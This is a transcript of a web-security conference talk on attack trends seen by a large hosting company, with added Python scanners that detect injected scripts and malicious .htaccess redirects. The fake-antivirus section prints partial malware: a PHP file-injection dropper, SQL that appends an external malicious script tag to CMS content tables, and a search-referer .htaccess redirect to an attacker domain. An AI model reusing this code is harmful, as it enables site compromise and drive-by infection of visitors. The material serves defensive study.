Keeping up with the web application security (PowerPoint presentation transcript)
KEEPING UP WITH THE WEB APPLICATION SECURITY
Ganesh Devarajan & Todd Redfoot
Introduction
Todd Redfoot Chief Information Security Officer
Ganesh Devarajan Sr. Security Architect
The Background
(What does Go Daddy do?)
What does Go Daddy do?
- 9.4 Million Customers
- 48 Million Domains Under Management
- Over 5 Million Active Hosting Accounts
- 1/3 of all DNS queries run through our servers
- We register, renew or transfer more than one domain name every second
What does Go Daddy do?
- 40+ Security Professionals in Team
- 24 x 7 Operations Center
- Research
- Engineering
- Forensics
- Customer Security Advisors
- Penetration Testing
- User Administration
- Development
The Numbers
(What does Go Daddy see?)
What do we see?
- Monitor over 100,000 events per second (8.6 Billion/Day)
- DDoS: ~900 Attacks per day / 6K per week
  - Feb 2011 - Largest attack @ 21M pps
  - Last Week - 40G Attack
- Brute Force: 3.5M per hour
What do we see?
“Other” Attacks:
- 425K – Invalid Directory Traversal
- 90K – XSS Prevention
- 115K – SQL Injection Prevention
… all in a 24 hour period…
Current Trends
SSH Brute Forcers
Source countries (pie chart): US 54%, CN 20%, KR 6%, BG 4%, AR 4%, TW 3%, FR 2%, JP 2%, CA 2%, BR 2%
SSH Brute Forcers
Englewood, Colorado: 140 million attempts
MS-SQL Brute Forcers
Source countries (pie chart): US 65%, CN 24%, TR 5%, CA 2%, - 1%, KR 1%, TH 1%, RU 0%, VN 0%, IE 0%
MS-SQL Brute Forcers
Orlando, FL: 348 million attempts
My-SQL Brute Forcers
Source countries (pie chart): US 78%, CN 12%, CA 4%, SE 2%, FR 2%, MY 1%, PH 1%, IN 0%, JP 0%, KR 0%
My-SQL Brute Forcers
FTP Brute Forcers
Source countries (pie chart): CN 66%, US 26%, HK 2%, CA 2%, IE 2%, TW 1%, KR 1%, RS 0%, DE 0%, BR 0%
FTP Brute Forcers
XingPing, CN: 12 million attempts
Brute Forcers - All
Source countries (pie chart): US 61%, CN 27%, TR 4%, KR 2%, CA 2%, - 1%, BG 1%, TH 1%, AR 1%, TW 1%
Brute Forcers - US
Garden City, NY: 75.7 million attempts
Brute Forcers - CN
Datong, CN: 22.5 million attempts
Brute Forcinator
SQL Injection
Source countries (pie chart): US 41%, CN 28%, BG 9%, UK 5%, ID 4%, NL 4%, CZ 3%, JP 3%, AU 2%, FR 2%
SQL Injection
Seattle, WA: 1.3 million attempts
Backdoor Shells
Source countries (pie chart): US 87%, ID 4%, NG 2%, UK 2%, CN 1%, CA 1%, DE 1%, BR 1%, NL 1%, AL 0%
Backdoor Shells
Phone Company (91%), Mountain View, CA
PHP Attacks
Source countries (pie chart): US 65%, KR 8%, FR 6%, RU 4%, DE 3%, LU 3%, UK 3%, BR 3%, CA 2%, NL 2%
PHP Attacks
Berlin, Germany: 1.9 million attempts
PHP Attacks
Montreal, CA: 1.1 million attempts
Botnet
Source countries (pie chart): US 52%, UK 7%, KR 6%, PL 6%, FR 6%, DE 6%, CA 6%, RU 5%, NL 4%, AU 3%
Botnet
Botnet
Source - https://zeustracker.abuse.ch/
Botnet
Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
Phishing
The Good, Bad and Ugly?
The Bad – Most Events
The Ugly – Security Events & DDoS
New Trends
Recent Changes
- “Hacktivists”: Lulzsec = Twitter, ComodoHacker = Pastebin
- Phishing -> Spear Phishing
- Targeted & Coordinated Attacks
  - RSA / Lockheed Martin Connection
What’s in the News?
More of the same…
- More Client-side Exploits
  - Browser exploits
  - Adobe exploits
- Web Server Compromises
  - Brute Force Attacks
  - Leveraging Web Application Vulnerabilities
  - Config files with passwords
Fake AV
- Scareware
  - Reports fake viruses to users
  - Asks for fee to remove the threat
  - Paying does nothing but give them your CC#
- $10 Million in Revenue last year
Fake AV Analysis
Fake AV – Attack Breakdown (diagram labels, in order of the attack chain)
- Fake AV Basterds
- FTP/SSH Upload of Attack Shell/Script
- Compromised Attack Server(s)
- Make HTTP calls to infection script and site is infected
- Servers with Compromised Accounts (Zeus/Phishing/etc), now carrying: `<script>http://intermediary.com/ll.php</script>`
- Disposable Domain Name. Registrant: Hilary Kneber [email protected] fax: 756946829/2 Sun street. Montey 29 Virginia NA 3947
- Casual Web User Visits Infected Site: `GET http://intermediary.com/ll.php`
- End Users see: `<html>Holy Crap! Infected! Click Here to clean</html>`
- $$$$$$
Fake AV – Sample Shell

```php
// Starts at the web root of the compromised account
$z=$_SERVER["DOCUMENT_ROOT"];
// Payload to be written into files; the base64 body was elided on the slide
$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';
// Removes the dropper itself once it is running
@unlink($_SERVER['SCRIPT_FILENAME']);
$val=$z;
$totalinjected=0;
echo "Working with $val\n!!STARTING!!";
ob_flush();
$start_time=microtime(true);
// do_folder() (not shown on the slide) walks the tree and injects $encoded
if ($val!="")do_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";
```
Fake AV – DB Variant

```php
// ...
$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';
// ...
$link=mysql_connect($host,$user,$pass);
if (!$link) {
    die('Could not connect: ' . mysql_error());
}else{
    echo 'Connected successfully'."\n";
    $db_list = mysql_list_dbs($link);
    $bases = array();
    while ($row = mysql_fetch_object($db_list)) {
        $bases[]=$row->Database;
    }
// ...
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')"; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2"; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')"; }
```
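The DB variant appends an external script tag to the content columns of whatever CMS tables it recognises by name suffix. A defender can turn that targeting logic around and scan the same tables for script tags loading from hosts outside an allowlist. The following is an added example, not code from the talk; it uses an in-memory SQLite database with constructed WordPress, Joomla and Drupal tables, and the injected domain is a `.invalid` placeholder.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Table-name suffix -> column pairs are the ones the DB variant rewrites
# (WordPress posts, Joomla content, Drupal node revisions, generic *_post tables).
TARGETS = {"_posts": "post_content", "_content": "introtext",
           "node_revisions": "body", "_post": "title"}
# External <script src="http(s)://..."> tags; their hostnames are compared to an allowlist.
SCRIPT_RE = re.compile(r'<script\s+src=["\']?(https?://[^"\'\s>]+)', re.I)


def find_injected_scripts(conn, allowed_hosts):
    """Return (table, rowid, url) for each script tag loading from a host outside the allowlist."""
    hits = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        cols = {r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')}
        for suffix, column in TARGETS.items():
            if not table.endswith(suffix) or column not in cols:
                continue
            for rowid, text in conn.execute(f'SELECT rowid, "{column}" FROM "{table}"'):
                for url in SCRIPT_RE.findall(text or ""):
                    host = (urlparse(url).hostname or "").lower()
                    if host not in allowed_hosts:
                        hits.append((table, rowid, url))
    return hits


def build_sample_db():
    """Constructed sample: a WordPress, a Joomla and a Drupal table; two rows carry the injected tag."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_posts (post_content TEXT);
        CREATE TABLE jos_content (introtext TEXT);
        CREATE TABLE node_revisions (body TEXT);
        INSERT INTO wp_posts VALUES
          ('Hello world'),
          ('Clean post <script src="https://cdn.example.org/app.js"></script>'),
          ('Sale!<script src="http://injected-domain.invalid/js.php?kk=26"></script>');
        INSERT INTO jos_content VALUES
          ('Welcome<script src="http://injected-domain.invalid/js.php?kk=26"></script>');
        INSERT INTO node_revisions VALUES ('Plain Drupal body');
    """)
    return conn


if __name__ == "__main__":
    for table, rowid, url in find_injected_scripts(build_sample_db(), {"cdn.example.org"}):
        print(f"{table} rowid={rowid}: {url}")
```

Run it against a dump of a real hosting database by pointing `sqlite3.connect` at an imported copy, or swap the connection for the live CMS driver; the table-suffix matching is the part worth keeping.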
Fake AV - Search Redirect

```apache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]
</IfModule>
addhandler x-httpd-php-cgi .php4
addhandler x-httpd-php5-cgi .php5
addhandler x-httpd-php5-cgi .php
```
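The `.htaccess` above only fires for visitors arriving from search engines, which is why the site owner browsing directly never sees the redirect. An `.htaccess` audit that pairs each `RewriteRule` with the `RewriteCond` lines that govern it can flag exactly this pattern, plus the PHP handler remaps that often ship with it. This is an added example, not part of the talk; the sample file is constructed and the redirect target is a `.invalid` placeholder.

```python
import re
from urllib.parse import urlparse

# Referer substrings the slide's redirect keys on; a RewriteCond mentioning one means "search traffic".
SEARCH_ENGINES = ("ask.com", "google", "msn.com", "bing.com", "live.com",
                  "aol.com", "altavista", "excite.com", "yahoo")
COND_RE = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
RULE_RE = re.compile(r'^\s*RewriteRule\s+\S+\s+(https?://\S+)', re.I)
HANDLER_RE = re.compile(r'^\s*AddHandler\s+(\S*php\S*)\s+(.+?)\s*$', re.I)


def audit_htaccess(text, site_host):
    """Return (finding, line_no, detail) for referer-keyed off-site redirects and PHP handler remaps."""
    findings, search_conds = [], []
    for n, line in enumerate(text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            if any(e in m.group(1).lower() for e in SEARCH_ENGINES):
                search_conds.append(n)
            continue
        m = RULE_RE.match(line)
        if m:
            host = (urlparse(m.group(1)).hostname or "").lower()
            if search_conds and host != site_host.lower():
                findings.append(("search-referer redirect off-site", n, host))
            search_conds = []  # RewriteCond lines only govern the next RewriteRule
            continue
        m = HANDLER_RE.match(line)
        if m:
            findings.append(("php handler remapped", n, f"{m.group(1)} {m.group(2)}"))
    return findings


# Constructed sample mirroring the slide's pattern; the target domain is a placeholder.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://redirect-target.invalid/in.php?g=945 [R,L]
RewriteCond %{HTTPS} off
RewriteRule .* https://www.example.com/ [R,L]
</IfModule>
addhandler x-httpd-php5-cgi .php5
addhandler x-httpd-php-cgi .php4
"""

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, "www.example.com"):
        print(finding)
```

The legitimate HTTPS redirect in the sample is not flagged because no search-engine referer condition precedes it; only the rule tied to search referers and sending visitors off-site is reported.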
Custom Monitoring
UDP Flooder
How to Protect?
Website Vulnerability Scanners
- Website Protection - Site Scanner ($48/Year)
- Beyond Security ($99.95/Year)
- McAfee Secure™ (~$2100/Year)
- WhiteHat Security®
- IBM AppScan®
- Cenzic®
- HP WebInspect®
Web Based Malware Detection
- Virtual machine Honey pots
  - Monitor Creation of new Processes, File system or Registry entries, etc.
- Browser Emulation
- Reputation Service
  - Internet’s black list
- Signature Based Detection/Prevention
  - Intrusion Detection System/Intrusion Prevention System
  - Anti-Virus
New Methodologies
Questions?